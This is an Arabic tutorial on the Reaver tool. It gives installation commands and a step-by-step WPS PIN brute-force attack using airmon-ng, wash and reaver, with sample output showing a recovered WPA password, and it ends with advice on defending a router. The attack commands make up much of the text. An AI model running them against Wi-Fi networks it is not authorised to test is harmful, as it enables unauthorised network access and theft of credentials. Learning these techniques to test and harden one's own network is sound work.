جدول المحتويات
أمان الشبكات اللاسلكية أصبح واحدًا من أكثر المواضيع أهمية في مجال الأمن السيبراني، خاصةً مع الانتشار الواسع لاستخدام الإنترنت عبر شبكات Wi-Fi في المنازل والشركات. بعض الشبكات لا تزال تستخدم WPS (Wi-Fi Protected Setup)، وهي تقنية تجعل الاتصال بالشبكة أسهل ولكنها تُعتبر نقطة ضعف خطيرة.
أداة Reaver هي واحدة من أشهر الأدوات التي تُستخدم لاختراق الشبكات عبر استغلال ثغرات WPS، مما يسمح بالحصول على مفتاح WPA/WPA2-PSK بسهولة. في هذا الدليل الشامل، سنشرح كيفية تثبيت واستخدام أداة Reaver، كيفية اختبار شبكتك بها، وأفضل الممارسات لحماية شبكتك من هذا النوع من الهجمات.
ما هي أداة Reaver؟

Reaver هي أداة مفتوحة المصدر تُستخدم لاستغلال WPS PIN لاستخراج مفتاح WPA/WPA2-PSK من شبكات الواي فاي. تم تطويرها كأداة اختبار اختراق لاكتشاف نقاط الضعف في الشبكات اللاسلكية، لكنها أصبحت تُستخدم من قبل المهاجمين لاختراق الشبكات غير المحمية بشكل صحيح.
مزايا أداة Reaver:
- استغلال بروتوكول WPS للوصول إلى مفتاح WPA/WPA2 دون الحاجة إلى تنفيذ هجمات القاموس الطويلة.
- إمكانية العمل بشكل تلقائي عبر تنفيذ هجمات القوة الغاشمة (Brute Force) ضد WPS PIN.
- دعم معظم بطاقات الشبكة اللاسلكية القابلة لوضع المراقبة (Monitor Mode).
- توفير معلومات تفصيلية عن نقاط الوصول المستهدفة.
عيوب أداة Reaver:
- تتطلب تمكين WPS على نقطة الوصول المستهدفة.
- بعض أجهزة الراوتر لديها آليات مضادة لهذه الهجمات مثل قفل WPS بعد عدد معين من المحاولات.
- تحتاج وقتًا طويلًا أحيانًا لاستخراج مفتاح WPA/WPA2-PSK.
كيفية تثبيت Reaver؟
1. تثبيت Reaver على نظام Linux

أداة Reaver متاحة في مستودعات العديد من توزيعات Linux ويمكن تثبيتها بسهولة.
على Debian/Ubuntu:
sudo apt update && sudo apt install reaver
على Arch Linux:
sudo pacman -S reaver
على Fedora/RHEL:
sudo dnf install reaver
إذا كنت ترغب في تثبيتها من المصدر، يمكنك ذلك عبر GitHub:
git clone <https://github.com/t6x/reaver-wps-fork-t6x.git>
cd reaver-wps-fork-t6x
./configure
make
sudo make install
بعد التثبيت، تحقق من أن الأداة تعمل باستخدام:
reaver --help
كيفية استخدام Reaver لاختبار شبكات Wi-Fi؟
1. تشغيل بطاقة الشبكة في وضع المراقبة (Monitor Mode)
قبل استخدام Reaver، تحتاج إلى وضع بطاقة الشبكة اللاسلكية في وضع المراقبة:
sudo airmon-ng start wlan0
سيظهر اسم الواجهة الجديدة، على سبيل المثال wlan0mon
.
2. البحث عن نقاط الوصول مع تمكين WPS
استخدم wash
لاكتشاف الشبكات التي تحتوي على WPS مفعّل:
sudo wash -i wlan0mon
مثال للمخرجات:
BSSID Channel WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------
00:11:22:33:44:55 6 1.0 No HomeNetwork
66:77:88:99:AA:BB 11 1.0 Yes OfficeNet
إذا كان WPS Locked = No، فهذا يعني أن الهجوم ممكن التنفيذ.
3. تنفيذ هجوم Reaver
بمجرد العثور على شبكة مناسبة، استخدم الأمر التالي:
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
تحليل الأمر:
i wlan0mon
: تحديد واجهة الشبكة.b 00:11:22:33:44:55
: عنوان MAC لنقطة الوصول المستهدفة.vv
: تفعيل وضع الإخراج المفصل.
مثال للمخرجات:
[+] Waiting for beacon from 00:11:22:33:44:55
[+] Switching wlan0mon to channel 6
[+] Associated with 00:11:22:33:44:55 (ESSID: HomeNetwork)
[+] Trying pin 12345670...
[+] Pin cracked! WPS PIN: '12345670'
[+] WPA PSK: 'MySecretPassword123!'
بمجرد العثور على WPS PIN الصحيح، سيقوم Reaver باستخراج كلمة مرور الشبكة (WPA/WPA2-PSK).
طرق الحماية من هجمات Reaver
1. تعطيل WPS تمامًا
أهم خطوة هي تعطيل WPS في إعدادات الراوتر. نظرًا لأن WPS هو نقطة الضعف الرئيسية التي يستغلها Reaver، فإن تعطيله يمنع أي هجمات من هذا النوع.
2. تحديث البرامج الثابتة للراوتر
تقوم بعض الشركات المصنعة بإصلاح ثغرات WPS عبر تحديثات البرامج الثابتة (firmware). تحقق من موقع الشركة المصنعة وقم بتحديث الراوتر إلى أحدث إصدار.
3. تمكين ميزة قفل WPS بعد عدة محاولات فاشلة
بعض أجهزة الراوتر توفر ميزة تمنع المزيد من المحاولات بعد عدد معين من التجارب الخاطئة. تأكد من تفعيل هذه الميزة إن كانت متاحة.
4. استخدام كلمة مرور قوية
حتى إذا تمكّن المهاجم من الوصول إلى WPS PIN، يمكن أن يكون لديك طبقة حماية إضافية عبر استخدام كلمة مرور قوية مع تعقيد عالي.
5. مراقبة الشبكة لاكتشاف النشاط المشبوه
استخدم أدوات مثل Wireshark أو airodump-ng لمراقبة الشبكة ومعرفة ما إذا كان هناك نشاط غير طبيعي أو محاولات هجوم.
الخاتمة
أداة Reaver واحدة من أقوى الأدوات التي تُستخدم لاختراق شبكات Wi-Fi عبر استغلال WPS. في هذا الدليل، تناولنا كيفية تثبيت، تشغيل، واستخدام Reaver مع أمثلة عملية لإظهار كيفية تنفيذ الهجمات.
ولكن الأهم من ذلك، ناقشنا كيفية حماية شبكتك من هذه الهجمات!
إذا كنت مسؤول شبكة أو مستخدمًا منزليًا، تأكد من تعطيل WPS، تحديث البرامج الثابتة، ومراقبة الشبكة باستمرار.